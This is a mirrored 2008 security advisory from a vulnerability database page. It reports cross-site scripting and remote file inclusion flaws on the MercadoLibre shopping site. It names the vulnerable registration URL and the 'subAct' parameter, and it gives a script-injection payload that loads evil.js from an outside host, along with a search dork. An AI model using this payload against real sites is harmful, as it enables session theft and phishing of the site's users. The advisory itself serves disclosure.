Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

mercadolibre-xssrfi.txt

🗓️ 29 Aug 2008 00:00:00Reported by Ivan SanchezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

mercado libre online shopping site has XSS, RFI, Phishing flaw

Code
`[ www.nullcode.com.ar ]   
  
+========================================================================================+  
+ Mercadolibre.com security compromised with XSS/ RFI /Phishing flaws +  
+========================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
Product: mercadolibre.com  
  
Web:https://www.mercadolibre.com  
  
Versions,sites affected: Copyright 1999-2008 MercadoLibre S.A.  
  
  
Date: 27/08/2008  
  
  
  
mercadolibre's Shopping Online application is vulnerable to a lot vulnerabilities.  
  
The site runs over SSL "SECURE SOCKET LAYER" Ohh fantastic... ,   
  
which is the technology that turns your browser address bar green for known safe sites and red for known spoof sites.  
  
The idea behind SSL is that users can easily tell if they are on a known safe site and be warned if they’re on a spoof site.  
  
  
  
  
GOOGLE DORKS:  
------------  
  
"mercadolibre.com"  
  
  
  
Domains affected part I:  
------------------------  
  
https://site-affected/jms/mla/reg?act=mail&subAct=<evil-code>  
  
  
Parameter affeted:  
-----------------  
  
subAct  
  
  
  
Evil code to input into parameter: "><script src=http://site/scripts/evil.js></script>   
  
  
  
Remediation: review and then sanitized all internal code.  
------------  
  
  
run over SLL----  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+==============================================================================+  
+ Mercadolibre.com security compromised with XSS/ RFI /Phishing flaws +  
+==============================================================================+  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
mercado librexssrfiphishingsslsecurityvulnerabilitysanitized code
17